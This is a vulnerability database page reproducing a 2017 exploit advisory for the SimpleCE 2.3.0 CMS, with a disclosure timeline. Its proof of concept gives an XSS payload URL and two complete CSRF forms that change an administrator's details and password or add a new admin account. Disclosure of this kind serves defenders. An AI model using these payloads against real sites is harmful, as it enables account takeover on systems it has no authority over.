Vulners
Lucene search
SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting
`# Exploit Title: SimpleCE 2.3.0 - Multiple Vulnerabilities XSS CSRF
# Date: 2017-06-14
# Exploit Author: 8bitsec
# Vendor Homepage: http://simplece.com
# Software Link: https://codecanyon.net/item/simplece-v2-mini-cms/9140868
# Version: 2.3.0, probably older versions
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: [email protected]
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-06-14
Product & Service Introduction:
===============================
SimpleCE is a simple Content-Management System with front-end editor mode.
Vulnerability Disclosure Timeline:
==================================
2017-06-13: Vulnerability found.
2017-06-13: Reported to vendor.
2017-06-14: No answer.
2017-06-14: Published.
Technical Details & Description:
================================
Authenticated XSS vulnerability found on http://[server]/[path]/index.php/content/text/1?return_url=[XSS] exploitable as a regular or admin user.
CSRF vulnerability can be exploited to add an administrator or change its info including password.
Proof of Concept (PoC):
=======================
XSS:
http://[server]/[path]/index.php/content/text/1?return_url=<svg/onload=alert(/8bitsec/)>
CSRF:
Modify User:
<form action="http://[server]/[path]/index.php/user/1" autocomplete="off" method="post" accept-charset="utf-8">
<label>Username<input type="text" name="username" id="username" placeholder="Username" value="admin" required="required" /></label>
<label>Email<input type="email" name="email" id="email" placeholder="Email" value="[email protected]" required="required" /></label>
<label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="John" /></label>
<label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="Doe" /></label>
<label>Password<input type="password" name="password" id="password" placeholder="Password" /></label>
<label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)"/></label>
<button type="submit" name="save" id="save" value="save">save</button>
</form>
Add User:
<form action="http://[server]/[path]/index.php/user/new" autocomplete="off" method="post" accept-charset="utf-8">
<label>Username<input type="text" name="username" id="username" placeholder="Username" value="adminuser" required="required" /></label>
<label>Email<input type="email" name="email" id="email" placeholder="Email" value="[email protected]" required="required" />
<label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="admin" />
<label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="user" /></label>
<label>Password<input type="password" name="password" id="password" placeholder="Password" required="required" /></label>
<label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)" required="required" /></label>
<label for="group">Role<select name="group" id="group" required="required">
<option value="2" >User</option>
<option value="1" selected="selected">Admin</option>
</select>
</label>
<button type="submit" name="save" id="save" value="save">save</button>
</form>
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jun 2017 00:00Current